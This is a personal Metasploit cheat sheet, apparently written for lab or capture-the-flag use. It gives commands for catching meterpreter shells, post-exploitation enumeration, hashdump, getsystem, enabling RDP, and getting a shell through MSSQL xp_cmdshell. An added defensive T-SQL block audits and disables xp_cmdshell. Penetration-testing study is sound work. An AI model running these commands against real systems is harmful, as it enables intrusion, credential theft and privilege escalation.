Metasploit


Last updated 2 years ago

This page is just basic stuff I forget all the time. There are other Metasploit tips in sections where it's relevant.

Advanced options

Metasploit is so derp-easy that you can often exploit a machine by setting the remote IP in RHOST and hitting the pew-pew button.

But sometimes that doesn't work and you cry because you know you're just a lame script kiddie pretending to be a hacker. However, you can aspire to be a decent script kiddie by knowing how to use more advanced options in Metasploit.

Exploits might not work because of an unusual configuration or path issue; you can inspect and set these with either show options or show advanced. The advanced section usually lets you set VERBOSE true to get more information about why an exploit isn't working.

You might also need to set the correct target:

show targets
set target [target number]

You sometimes need this because the module can't always identify the exact operating system version and language pack.

It's also important to pay attention to the default payload. Occasionally, you'll run into something weird like an Apache web server running on Windows, so the default Unix payload won't work.

Check and modify the payload:

show payloads
set payload [whatever]

Meterpreter

To catch shells using meterpreter:

use exploit/multi/handler
set LHOST [attack machine]
set LPORT 443
run

If you're VPNed into a lab, pay attention to the IP address. I've noticed that the first time this module runs, it defaults to eth0 and you have to restart it to use something like tap0.

Basic commands

Frequently used commands, mostly to enumerate a victim machine:

getuid      # get current user
sysinfo     # gets OS and hostname
execute     # execute a command
cd          # change directory
pwd         # print working directory
ls          # list files in current directory
mkdir       # make a directory
del         # delete a file
cat         # read the contents of a file
download    # download a file to your machine
hashdump    # get contents of password file
edit        # edit a file with vim
rm          # delete a file
rmdir       # remove directory
upload      # upload a file to the victim
ps          # list running processes
migrate     # move the active process to a designated PID
getpid      # get the current process ID (PID)
kill        # terminate a process by PID
ipconfig    # display network interfaces
portfwd     # forward a port on the victim to a remote service
route       # view or modify routing table
getprivs    # get as many privileges as possible
getsystem   # get Administrator
reboot      # reboot the victim
shutdown    # shut down the victim
reg         # interact with the victim's registry

Sessions

To list active sessions:

sessions -l

To enter a session:

sessions -i [session number]

To drop into a native OS shell from a session (instead of using meterpreter commands):

shell

To exit the shell and return to meterpreter, type exit.

Useful exploits

I mostly use Metasploit on Windows machines because they still feel tricky to me. Below is a list of useful exploits for enumerating and running complex commands.

Windows

Once you have a meterpreter shell, you can scan for local exploits and run them. Unlike remote exploits, which target a host by IP address, local exploits run against a chosen shell session.

To access local exploits, you'll need to jump out of meterpreter using background and select one with the use command:

meterpreter > background
use exploit/windows/local/[module name]
show options
[edit options as needed]
set SESSION [session number]
run

Check for exploits:

meterpreter > run post/multi/recon/local_exploit_suggester

Get a remote desktop:

meterpreter > run post/windows/manage/enable_rdp

Run a command as a different user:

background
use post/windows/manage/run_as
[set username and password]
set CMDOUT true # output results of command
set CMD "type C:\Users\Administrator\Desktop\root.txt"
run

MSSQL

If you have credentials, you can use this module to get a shell:

use exploit/windows/mssql/mssql_payload
[set username and password]
run
sqsh -S [remote host]:[port] -U [username] -P [password]

You can then attempt to launch xp_cmdshell with the following syntax:

xp_cmdshell 'date'
go
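The module above relies on xp_cmdshell, which isn't always enabled. As an added example that is not from the original page, the T-SQL below is what a defender would run on the instance to audit that setting, see which principals have been granted EXECUTE on it, and turn the feature back off; it assumes a login with ALTER SETTINGS (e.g. sysadmin).

```sql
-- Added example (not part of the original page). Run in master.
USE master;

-- 1. Audit: sys.configurations exposes the same knobs as sp_configure.
--    value_in_use is the live setting; value is the pending one
--    (the two differ until RECONFIGURE runs). 1 = enabled, 0 = disabled.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Who could call it besides sysadmin? Non-sysadmin logins need an
--    explicit EXECUTE grant on the extended procedure (plus a proxy account).
SELECT pr.name AS grantee, pe.permission_name, pe.state_desc
FROM sys.database_permissions AS pe
JOIN sys.database_principals AS pr
  ON pe.grantee_principal_id = pr.principal_id
WHERE pe.major_id = OBJECT_ID('sys.xp_cmdshell');

-- 3. Hardening: xp_cmdshell is an "advanced" option, so sp_configure only
--    accepts it while 'show advanced options' is on. Switch it off, then
--    hide advanced options again.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 4. Re-check: value_in_use for xp_cmdshell should now be 0.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';
```

Disabling the procedure does not revoke existing EXECUTE grants, so step 2 is worth re-running after any cleanup.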

Meterpreter is nice because it lets you maintain multiple shell sessions and use local exploits against them. For example, the Rejetto exploit always seems to fire a few times, and with meterpreter you can catch every shell session with a single listener.

There are manual ways to run commands as a different user, but I haven't tried them because I'm lazy.

It uses the xp_cmdshell stored procedure, which isn't always enabled but can be. You could probably do the same exploit manually using a tool like dbeaver, but I haven't managed it yet. If you're attacking a very old version of MSSQL (e.g. 2000), you can connect to it using sqsh (the sqsh command in the block above).

MS08-067